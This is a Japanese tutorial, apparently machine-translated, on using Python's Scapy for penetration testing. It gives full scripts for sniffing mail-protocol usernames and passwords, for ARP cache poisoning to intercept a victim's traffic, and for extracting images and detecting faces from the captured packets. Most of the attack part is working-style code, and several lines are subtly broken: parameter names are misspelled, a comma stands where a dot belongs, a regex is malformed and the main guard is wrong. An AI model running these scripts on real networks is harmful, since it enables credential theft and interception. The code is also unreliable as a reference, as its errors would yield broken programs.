Scapy は Python モジュールであり、基礎となるネットワーク データ パケットの解析に使用される対話型プログラムです。このプログラムは基礎となるパケット処理を抽象的にパッケージ化し、ネットワーク データ パケットの処理を非常に単純にします。このクラス ライブラリには、ネットワーク セキュリティの分野で非常に幅広い使用例があり、脆弱性悪用の開発、データ漏洩、ネットワーク監視、侵入検出、トラフィック分析とキャプチャに使用できます。 Scapy はデータの視覚化とレポート生成と統合されており、結果とデータを簡単に表示できます。
Scapy は簡潔な名前のインターフェイス関数 sniff を提供します。その定義は次のとおりです:
sniff(filter = " ", iface = "any", prn = function, count = N)
filter パラメーターを使用すると、Berkeley データ パケット フィルターを指定できます(Berkeley Packet Filter、BPF) は、Scapy によってスニッフィングされたパケットをフィルタリングするために使用されます。このパラメータを空白のままにして、すべてのパケットがスニッフィングされることを示すこともできます。
iface パラメータは、スニッファによってスニッフィングされるネットワーク カードを指定するために使用されます。設定されていない場合は、デフォルトですべてのネットワーク カードがスニッフィングされます。 prn パラメータは、コールバック関数を指定するために使用されます。フィルタリング条件を満たすパケットが見つかると、スニファはそのパケットをこのコールバック関数に渡します。これは、この関数で受け入れられる唯一のパラメータです。 count パラメータを使用して、スニッフィングするパケットの数を指定できます。空白のままにすると、Scapy はスニッフィングを続けます。
mail_sniffer.py:
from scapy.all import sniff def packet_callback(packet): print(packet.show()) def main(): sniff(pro=packet_callback, count=1) if __name__ == '__main__': main()
この単純なスニファーでは、メールボックス プロトコルに関連するコマンドのみをスニッフィングします。
次に、フィルターとコールバック関数コードを追加して、電子メール アカウント認証に関連するデータを的を絞った方法でキャプチャします。
まず、パケット フィルターを設定して、スニファーが関心のあるパケットのみを表示するようにします。 BPF 構文 (Wireshark スタイル構文とも呼ばれる) を使用してフィルターを作成します。この構文は、tcpdump や Wireshark などのツールで使用できます。まず基本的な BPF 構文について説明します。 BPF 構文では、図に示すように、記述子 (特定のホスト アドレス、ネットワーク カード名、ポート番号など)、データ フローの方向、通信プロトコルの 3 種類の情報を使用できます。探しているデータに応じて、特定のタイプ、方向、プロトコルを自由に追加または省略できます。
まず BPF を作成しましょう:
from scapy.all import sniff, TCP, IP #the packet callback def packet_callback(packet): if packet[TCP].payload: mypacket = str(packet[TCP].paylaod) if 'user' in mypacket.lower() or 'pass' in mypacket.lower(): print(f"[*] Destination: {packet[IP].dst}") print(f"[*] {str(packet[TCP].payload)}") def main(): #fire up the sniffer sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0) #监听邮件协议常用端口 #新参数store,把它设为0以后,Scapy就不会将任何数据包保留在内存里 if __name__ == '__main__': main()
ロジック: ターゲット デバイスを騙して、自分がゲートウェイであると信じ込ませます。 ; 次に、ゲートウェイを偽装し、ターゲット デバイス宛てのすべてのトラフィックを私たちに転送する必要があることをゲートウェイに伝えます。ネットワーク上のすべてのデバイスは ARP キャッシュを維持し、最近のローカル ネットワーク上の MAC アドレスと IP アドレスの対応を記録します。この攻撃を実行するには、これらの ARP キャッシュを毒します。つまり、捏造したレコードをキャッシュに挿入します。
実験のターゲット マシンは mac であることに注意してください
arper.py:
from multiprocessing import Process from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap) import os import sys import time def get_mac(targetip): packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip) resp, _= srp(packet, timeout=2, retry=10, verbose=False) for _, r in resp: return r[Ether].src return None class Arper: def __init__(self, victim, gateway, interface='en0'): self.victim = victim self.victimmac = get_mac(victim) self.gateway = gateway self.gatewaymac = get_mac(gateway) self.interface = interface conf.iface = interface conf.verb = 0 print(f'Initialized {interface}:') print(f'Gateway ({gateway}) is at {self.gateway}') print(f'Victim ({victim}) is at {self.gatewaymac}') print('_'*30) def run(self): self.poison_thread = Process(target=self.poison) self.poison_thread.start() self.sniff_thread = Process(target=self.sniff) self.sniff_thread.start() def poison(self): poison_victim = ARP() poison_victim.op = 2 poison_victim.psrc = self.gateway poison_victim.pdst = self.victim poison_victim.hwdst = self.victimmac print(f'ip src: {poison_victim.psrc}') print(f'ip dst: {poison_victim.pdst}') print(f'mac dst: {poison_victim.hwdst}') print(f'mac src: {poison_victim.hwsrc}') print(poison_victim.summary()) print('_'*30) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self,victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gatewaymac print(f'ip src: {poison_gateway.psrc}') print(f'ip dst: {poison_gateway.pdst}') print(f'mac dst: {poison_gateway.hwdst}') print(f'mac_src: {poison_gateway.hwsrc}') print(poison_gateway.summary()) print('_'*30) print(f'Beginning the ARP poison. [CTRL -C to stop]') while True: sys.stdout.write('.') sys.stdout.flush() try: send(poison_victim) send(poison_gateway) except KeyboardInterrupt: self.restore() sys.exit() else: time.sleep(2) def sniff(self, count=200): time.sleep(5) print(f'Sniffing {count} packets') bpf_filter = "ip host %s" % victim packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface) wrpcap('arper.pcap', packets) print('Got the packets') self.restore() self.poison_thread.terminate() print('Finished') def restore(self): print('Restoring ARP tables...') send(ARP( op=2, psrc=self.gateway, hwsrc=self.gatewaymac, pdst=self.victim, hwdst='ff:ff:ff:ff:ff:ff'), count=5) send(ARP( op=2, psrc=self.victim, hwsrc=self.victimmac, pdst=self.gateway, hwdst='ff:ff:ff:ff:ff:ff'), count=5) if __name__ == '__main__': (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3]) myarp = Arper(victim, gateway, interface) myarp.run()
recapper.py:
from scapy.all import TCP, rdpcap import collections import os import re import sys import zlib OUTDIR = '/root/Desktop/pictures' PCAPS = '/root/Downloads' Response = collections.namedtuple('Response', ['header','payload']) def get_header(payload): try: header_raw = payload[:payload.index(b'\r\n\r\n')+2] except ValueError: sys.stdout.write('_') sys.stdout.flush() return None header = dict(re.findall(r'?P<name>.*?): (?P<value>.*?)\r\n', header_raw.decode())) if 'Content-Type' not in header: return None return header def extract_content(Response, content_name='image'): content, content_type = None, None if content_name in Response.header['Content-Type']: content_type = Response.header['Content-Type'].split('/')[1] content = Response.payload[Response.payload.index(b'\r\n\r\n')+4:] if 'Content-Encoding' in Response.header: if Response.header['Content-Encoding'] == "gzip": content = zlib.decompress(Response.payload, zlib.MAX_wbits | 32) elif Response.header['Content-Encoding'] == "deflate": content = zlib.decompress(Response.payload) return content, content_type class Recapper: def __init__(self, fname): pcap = rdpcap(fname) self.session = pcap.session() self.responses = list() def get_responses(self): for session in self.session: payload = b'' for packet in self.session[session]: try: if packet[TCP].dport == 80 or packet[TCP].sport == 80: payload += bytes(packet[TCP].payload) except IndexError: sys.stdout.write('x') sys.stdout.flush() if payload: header = get_header(payload) if header is None: continue self.responses.append(Response(header=header, payload=payload)) def write(self, content_name): for i, response in enumerate(self.responses): content, content_type = extract_content(response, content_name) if content and content_type: fname = os.path.join(OUTDIR, f'ex_{i}.{content_type}') print(f'Writing {fname}') with open(fname, 'wb') as f: f.write(content) if __name__ == '__main__': pfile = os.path.join(PCAPS, 'pcap.pcap') recapper = Recapper(pfile) recapper.get_responses() recapper.write('image')
写真を取得したら、その写真を分析し、各写真をチェックして顔が写っているかどうかを確認する必要があります。顔を含む画像ごとに、顔の周りにボックスを描画し、それを新しい画像として保存します。
detector.py:
import cv2 import os ROOT = '/root/Desktop/pictures' FACES = '/root/Desktop/faces' TRAIN = '/root/Desktop/training' def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN): for fname in os.listdir(srcdir): if not fname.upper().endswith('.JPG'): continue fullname = os.path.join(srcdir, fname) newname = os.path.join(tgtdir, fname) img = cv2.imread(fullname) if img is None: continue gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml') cascade = cv2.CascadeClassifier(training) rects = cascade.detectMultiScale(gray, 1.3,5) try: if rects.any(): print('Got a face') rects[:, 2:] += rects[:, :2] except AttributeError: print(f'No faces fount in {fname}') continue # highlight the faces in the image for x1, y1, x2, y2 in rects: cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2) cv2.imwrite(newname, img) if name == '__main__': detect()
以上がPython 侵入テスト入門: Scapy ライブラリの使用方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。